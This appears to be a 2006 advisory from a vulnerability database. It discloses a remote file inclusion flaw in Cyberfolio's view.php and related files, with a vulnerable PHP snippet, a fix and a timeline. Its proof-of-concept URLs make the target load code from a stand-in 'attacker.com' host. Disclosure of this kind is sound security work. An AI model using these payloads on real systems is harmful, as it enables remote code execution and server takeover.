Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14942
HistoryNov 06, 2006 - 12:00 a.m.

[ECHO_ADV_58_2006]Cyberfolio <=2.0 RC1 $av Remote File Inclusion Vulnerability

2006-11-0600:00:00
vulners.com
61

[ECHO_ADV_58$2006]Cyberfolio <=2.0 RC1 $av Remote File Inclusion Vulnerability

Author : Dedi Dwianto a.k.a the_day
Date Found : November, 01nd 2006
Location : Indonesia, Jakarta
web : http://advisories.echo.or.id/adv/adv58-theday-2006.txt
Critical Lvl : Highly critical
Impact : System access
Where : From Remote

Affected software description:


Application     : Cyberfolio
version         : &lt;=2.0 RC1
URL             : http://www.cyberfolio.org

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~

I found vulnerability in script view.php
--------------------------view.php-----------------------------------
....
&lt;?
...
$newfic=$av.&quot;checkauth&quot;.$_SESSION[inlog].&quot;.php&quot;;
include&#40;&quot;$newfic&quot;&#41;;
include_once&#40;$av.&quot;config.php&quot;&#41;;
include_once&#40;$av.&quot;connect.php&quot;&#41;;
...
----------------------------------------------------------

Input passed to the &quot;$av&quot; parameter in view.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources.

Also affected files :

portfolio/msg/view.php
portfolio/msg/inc_message.php
portfolio/msg/inc_envoi.php
portfolio/admin/incl_voir_compet.php


Proof Of Concept:
~~~~~~~~~~~~~~~

http://target.com/cyberfolio/portfolio/msg/view.php?av=http://attacker.com/inject.txt?
http://target.com/cyberfolio/portfolio/admin/incl_voir_compet.php?av=http://attacker.com/inject.txt?


Solution:
~~~~~~~

- Sanitize variable $av affected files.
- Turn off register_globals

Timeline :
~~~~~~~~~

01 - 11 - 2006 bugs found
01 - 11 - 2006 vendor contacted
07 - 11 - 2006 public disclosure

---------------------------------------------------------------------------

Shoutz:
~~~
~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S&#96;to,lirva32,anonymous
~ Jessy My Brain
~ az001,bomm_3x,matdhule,angelia
~ [email protected]
~ #aikmel - #e-c-h-o @irc.dal.net
------------------------------------------------------------------------
---
Contact:
~~~~
     EcHo Research &amp; Development Center
     the_day[at]echo[dot]or[dot]id
     
-------------------------------- [ EOF ]----------------------------------